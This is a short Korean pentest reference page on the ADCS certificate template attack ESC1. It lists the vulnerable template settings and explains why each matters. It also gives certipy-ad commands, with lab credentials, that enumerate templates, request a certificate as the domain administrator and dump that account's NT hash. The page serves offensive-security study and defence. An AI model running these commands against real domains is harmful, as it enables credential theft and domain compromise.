ESC1
ESC1은 다음과 같은 속성들이 모두 만족할 때 가능한 ADCS 공격입니다.
속성
값
Enrollee Supplies Subject
True
Requires Manager Approval
False
Authorized Signatures Required
0
Enrollment Rights
공격자가 컨트롤 가능한 객체 이하의 권한
Abuse
# 취약한 템플릿 열거
certipy-ad find -u Mick3y -p 'Password123!' -dc-ip 192.168.1.11 -vulnerable -stdout -enabled
# 템플릿을 통한 인증서 발급
certipy-ad req -u Mick3y -p 'Password123!' -dc-ip 192.168.1.11 -target AD01.CONTOSO.COM -ca CONTOSO-AD01-CA -template ESC1 -upn [email protected]
# 인증서로부터 nt해시 덤프
certipy-ad auth -pfx administrator.pfx -dc-ip 192.168.1.11Root Cause
Enrollee Supplies Subject
이 속성을 활성화하면 인증서를 요청하는 주체는 요청 주체의 이름을 변경할 수 있습니다.
Enrollment Rights
이 속성은 템플릿을 통해 인증서를 요청할 수 있는 권한이며 특정 유저(예 : 인증서 멤버)에게 국한하여 할당될 수 있습니다. 때문에 어떤 유저 계정을 탈취했냐에 따라 활용 가능한 ESC 취약점이 달라집니다.
Requires Manager Approval & Authorized Signatures Required
Requires Manager approval 속성이 체크되어 있을 땐, 클라이언트가 인증서 요청 시 관리자가 이를 허가해야만 발급되는 절차입니다. 속성에 입력된 값만큼 서명이 요구되며 기본값은 0입니다.
References
Last updated
Was this helpful?